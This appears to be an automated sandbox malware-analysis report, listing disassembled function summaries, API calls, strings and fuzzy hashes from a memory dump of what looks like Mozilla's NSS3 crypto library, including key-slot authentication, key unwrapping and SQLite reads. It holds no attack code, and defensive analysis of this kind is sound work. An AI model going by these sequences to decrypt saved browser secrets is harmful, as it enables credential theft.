Part of subcall function 6D56BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6D56800A,00000000,?,00000000,?), ref: 6D56BC3F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 2789a6250de0d8df9e5d3f738678fa64fbeb3f730c425bf3914d5358b7a21c7d
Instruction ID: 7e90ecc7eeb03042b287bb97fa5bc003626a1a4b3d4e749255304a0c9511cf62
Opcode Fuzzy Hash: 2789a6250de0d8df9e5d3f738678fa64fbeb3f730c425bf3914d5358b7a21c7d
Instruction Fuzzy Hash: 4DE1A471A083419FE719CF24C840B2A77E5BF85318F054D6CE9999BBA1E732EC45CB62

Function 6D4F1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6D4F1C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6D4F1C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6D4F1CA1
GetLengthSid.ADVAPI32(?), ref: 6D4F1CA9
malloc.MOZGLUE(00000000), ref: 6D4F1CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6D4F1CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6D4F1CE4
GetLengthSid.ADVAPI32(?), ref: 6D4F1CEC
malloc.MOZGLUE(00000000), ref: 6D4F1CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6D4F1D0F
CloseHandle.KERNEL32(?), ref: 6D4F1D17
AllocateAndInitializeSid.ADVAPI32 ref: 6D4F1D4D
GetLastError.KERNEL32 ref: 6D4F1D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6D4F1D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6D4F1D7A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: 8babee04690c3e4d6e2ef44d200b3cd37c05ff206a72a512ee1fec51b050c56d
Instruction ID: e8d3fb2fb5818a0c7fa778831d117ebcef901bf1addc23d80f2d75c4d5cca821
Opcode Fuzzy Hash: 8babee04690c3e4d6e2ef44d200b3cd37c05ff206a72a512ee1fec51b050c56d
Instruction Fuzzy Hash: C63130B5900258AFEF10DF65CC48BAA7BB8FF4A309F014169F60AE2151E73159D4CF65

Function 6D4F3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6D4F3DFB
__allrem.LIBCMT ref: 6D4F3EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D4F3FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6D4F4047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6D4F40DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D4F415F
__allrem.LIBCMT ref: 6D4F416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D4F4288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D4F42AB
__allrem.LIBCMT ref: 6D4F42B7

Strings

%lld, xrefs: 6D4F3FB2
%02d, xrefs: 6D4F4086
%04d, xrefs: 6D4F407B
%03d, xrefs: 6D4F42E8

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: fcced1d47399ef3f187ec3284523aa3124d99011a7c73b48101e0a7ed698d365
Instruction ID: 6fc6579025bf4b4c196b399e80780046ff20ec85f091f639f443ee40d52b0c96
Opcode Fuzzy Hash: fcced1d47399ef3f187ec3284523aa3124d99011a7c73b48101e0a7ed698d365
Instruction Fuzzy Hash: 63F10171A087419FD715CF78C945B6AB7E6FFC9384F108A2DE58997261EB30DC828B42

Function 6D4A1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D4A1D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D4A1EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6D4A1FB7

Strings

SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6D4A1F83
no more rows available, xrefs: 6D4A2264
sqlite_master, xrefs: 6D4A1C61
unsupported file format, xrefs: 6D4A2188
table, xrefs: 6D4A1C8B
sqlite_temp_master, xrefs: 6D4A1C5C
another row available, xrefs: 6D4A2287
abort due to ROLLBACK, xrefs: 6D4A2223
unknown error, xrefs: 6D4A2291
attached databases must use the same text encoding as main database, xrefs: 6D4A20CA

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
API String ID: 563213449-2102270813
Opcode ID: dd708b5302924dca2e676d41012b589f5d8436963e9df0c64fcd5f0bfd6f8367
Instruction ID: 23e547c86f16000d30d29eb5f71892c9f829c23650980e068e26cd7b18635f62
Opcode Fuzzy Hash: dd708b5302924dca2e676d41012b589f5d8436963e9df0c64fcd5f0bfd6f8367
Instruction Fuzzy Hash: E212BE7060C3428FD715CF19C480A2AB7E2BFA9314F29856DE9959B35AD731EC46CB82

Function 6D56EFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6D56C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6D56DAE2,?), ref: 6D56C6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D56F0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D56F0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6D56F101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D56F11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6D63218C), ref: 6D56F183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6D56F19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D56F1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6D56F1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6D56F210

Part of subcall function 6D5152D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6D56F1E9,?,00000000,?,?), ref: 6D5152F5
Part of subcall function 6D5152D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6D51530F
Part of subcall function 6D5152D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6D515326
Part of subcall function 6D5152D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6D56F1E9,?,00000000,?,?), ref: 6D515340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D56F227

Part of subcall function 6D55FAB0: free.MOZGLUE(?,-00000001,?,?,6D4FF673,00000000,00000000), ref: 6D55FAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6D56F23E

Part of subcall function 6D55BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6D50E708,00000000,00000000,00000004,00000000), ref: 6D55BE6A
Part of subcall function 6D55BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6D5104DC,?), ref: 6D55BE7E
Part of subcall function 6D55BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6D55BEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D56F2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6D56F3A8

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6D56F3B3

Part of subcall function 6D512D20: PK11_DestroyObject.NSS3(?,?), ref: 6D512D3C
Part of subcall function 6D512D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6D512D5F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: f41203dde3ce64f176f4196cecd6619e880001f8a1cfbca98716035737437e7c
Instruction ID: 6ba1fc12d2a7142d2d6db64c77ff0eded41fdf8ac995e0a952a0e879c3d2b912
Opcode Fuzzy Hash: f41203dde3ce64f176f4196cecd6619e880001f8a1cfbca98716035737437e7c
Instruction Fuzzy Hash: D8D1A1B6E042469FEB18CF99D880AAEB7F5FF48344F158469D915A7721EB31EC01CB60

Function 6D54A9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6D54A9CA

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6D660B04,?), ref: 6D54A9F7

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6D54AA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D54AA33
PK11_GetInternalKeySlot.NSS3 ref: 6D54AA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6D54AA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6D54AAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6D54AB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D54AB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6D54AB85
PK11_FreeSymKey.NSS3(00000000), ref: 6D54AB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6D54ABDC
PK11_FreeSymKey.NSS3(?), ref: 6D54ABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D54ABF7

Part of subcall function 6D54AC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6D54AB3E,?,?,?), ref: 6D54AC35
Part of subcall function 6D54AC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6D54AB3E,?,?,?), ref: 6D54AC55
Part of subcall function 6D54AC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6D54AB3E,?,?), ref: 6D54AC70
Part of subcall function 6D54AC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6D54AC92
Part of subcall function 6D54AC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6D54AB3E), ref: 6D54ACD7

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID:
API String ID: 2602994911-0
Opcode ID: 54fd7aadd375e90ae652b07ce73c39dae095d2692991f08f24039d98ecabe3c4
Instruction ID: 626ea13a5e2029114d9a8fd993119290bbcfc6ad100305b41a885740652c9240
Opcode Fuzzy Hash: 54fd7aadd375e90ae652b07ce73c39dae095d2692991f08f24039d98ecabe3c4
Instruction Fuzzy Hash: 8F7102729083029BE749CE259C40F2BB3A5AFD4358F01CE39FA6497651EB31DD448793

Function 6D52FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6D52FD06

Part of subcall function 6D52F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6D52F696
Part of subcall function 6D52F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6D52F789
Part of subcall function 6D52F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6D52F796
Part of subcall function 6D52F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6D52F79F
Part of subcall function 6D52F670: SECITEM_DupItem_Util.NSS3 ref: 6D52F7F0

Part of subcall function 6D553440: PK11_GetAllTokens.NSS3 ref: 6D553481
Part of subcall function 6D553440: PR_SetError.NSS3(00000000,00000000), ref: 6D5534A3
Part of subcall function 6D553440: TlsGetValue.KERNEL32 ref: 6D55352E
Part of subcall function 6D553440: EnterCriticalSection.KERNEL32(?), ref: 6D553542
Part of subcall function 6D553440: PR_Unlock.NSS3(?), ref: 6D55355B

SECITEM_DupItem_Util.NSS3(?), ref: 6D52FDAD

Part of subcall function 6D55FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D509003,?), ref: 6D55FD91
Part of subcall function 6D55FD80: PORT_Alloc_Util.NSS3(A4686D56,?), ref: 6D55FDA2
Part of subcall function 6D55FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686D56,?,?), ref: 6D55FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6D52FE00

Part of subcall function 6D55FD80: free.MOZGLUE(00000000,?,?), ref: 6D55FDD1

Part of subcall function 6D54E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6D54E5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D52FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6D52FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6D52FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6D52FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6D52FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6D52FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6D52FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6D530007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6D530029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6D530044

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 17358f8bccb47a137c84126a94d31c516764635bbba3e074aa9d1eca0f85325e
Instruction ID: 32bbad960801aa2050cef688d4810981e38147960cb78613f80a190cf7c9c292
Opcode Fuzzy Hash: 17358f8bccb47a137c84126a94d31c516764635bbba3e074aa9d1eca0f85325e
Instruction Fuzzy Hash: 0FB1C471504302AFE708CF29D880A7BB7E5FF88318F558A2DE999C7A81E770E944CB51

Function 6D527D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6D527DDC

Part of subcall function 6D5607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D508298,?,?,?,6D4FFCE5,?), ref: 6D5607BF
Part of subcall function 6D5607B0: PL_HashTableLookup.NSS3(?,?), ref: 6D5607E6
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D56081B
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D560825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D527DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6D527F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6D527F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6D527F98
PK11_FreeSymKey.NSS3(?), ref: 6D527FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D527FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6D528000

Part of subcall function 6D549430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6D527F0C,?,00000000,00000000,00000000,?), ref: 6D54943B
Part of subcall function 6D549430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6D54946B
Part of subcall function 6D549430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6D549546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D528110
PK11_FreeSymKey.NSS3(00000000), ref: 6D52811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6D52822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6D52823C

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 71663913fce4b4939cd7c28cce0520046317323942fca12c11430507b4138d57
Instruction ID: 5f80f2653885a1eb754a8b6130361a35080fad32d16a9d841de5bb0ad7a4d97c
Opcode Fuzzy Hash: 71663913fce4b4939cd7c28cce0520046317323942fca12c11430507b4138d57
Instruction Fuzzy Hash: 24C173B1D0021A9BEB25CF64CC41FEAB7B8BF05304F0185E5E91DA6681E7319E99CF61

Function 6D49AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6D5BCF46,?,6D48CDBD,?,6D5BBF31,?,?,?,?,?,?,?), ref: 6D49B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6D5BCF46,?,6D48CDBD,?,6D5BBF31), ref: 6D49B090
sqlite3_free.NSS3(?,?,?,?,?,?,6D5BCF46,?,6D48CDBD,?,6D5BBF31), ref: 6D49B0A2
CloseHandle.KERNEL32(?,?,6D5BCF46,?,6D48CDBD,?,6D5BBF31,?,?,?,?,?,?,?,?,?), ref: 6D49B100
sqlite3_free.NSS3(?,?,00000002,?,6D5BCF46,?,6D48CDBD,?,6D5BBF31,?,?,?,?,?,?,?), ref: 6D49B115
sqlite3_free.NSS3(?,?,?,?,?,?,6D5BCF46,?,6D48CDBD,?,6D5BBF31), ref: 6D49B12D

Part of subcall function 6D489EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6D49C6FD,?,?,?,?,6D4EF965,00000000), ref: 6D489F0E
Part of subcall function 6D489EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6D4EF965,00000000), ref: 6D489F5D

Strings

`am, xrefs: 6D49B0DF

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `am
API String ID: 3155957115-3569388155
Opcode ID: c79fd60d049ca24b73e828862819b8c28606d9f9dc8512b4f4d24e03212532f7
Instruction ID: ceda5ef2c1e214bd9b71a7195bb832ef87ea83fc08a2ffe5afe7a12bbf6afa77
Opcode Fuzzy Hash: c79fd60d049ca24b73e828862819b8c28606d9f9dc8512b4f4d24e03212532f7
Instruction Fuzzy Hash: 7891ACB1A083068FDB05CF26C885F7ABBB1FF85344B24462DE4169B254EB31ED91CB81

Function 6D530EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6D530F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6D530FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6D531006
PK11_FreeSymKey.NSS3(?), ref: 6D53101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D531033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D53103F
PK11_FreeSymKey.NSS3(00000000), ref: 6D531048
memcpy.VCRUNTIME140(?,?,?), ref: 6D53108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6D5310BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6D5310D6
memcpy.VCRUNTIME140(?,?,?), ref: 6D53112E

Part of subcall function 6D531570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6D5308C4,?,?), ref: 6D5315B8
Part of subcall function 6D531570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6D5308C4,?,?), ref: 6D5315C1
Part of subcall function 6D531570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D53162E
Part of subcall function 6D531570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D531637

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
